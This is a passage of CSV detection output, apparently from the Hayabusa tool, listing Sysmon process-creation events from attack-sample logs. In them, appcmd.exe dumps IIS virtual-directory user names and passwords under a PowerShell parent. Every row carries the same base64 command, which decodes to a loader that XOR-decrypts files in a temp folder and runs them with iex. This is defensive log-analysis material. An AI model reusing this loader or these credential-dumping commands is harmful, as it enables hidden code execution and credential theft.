JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.964 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.034 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.124 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.204 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.305 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAH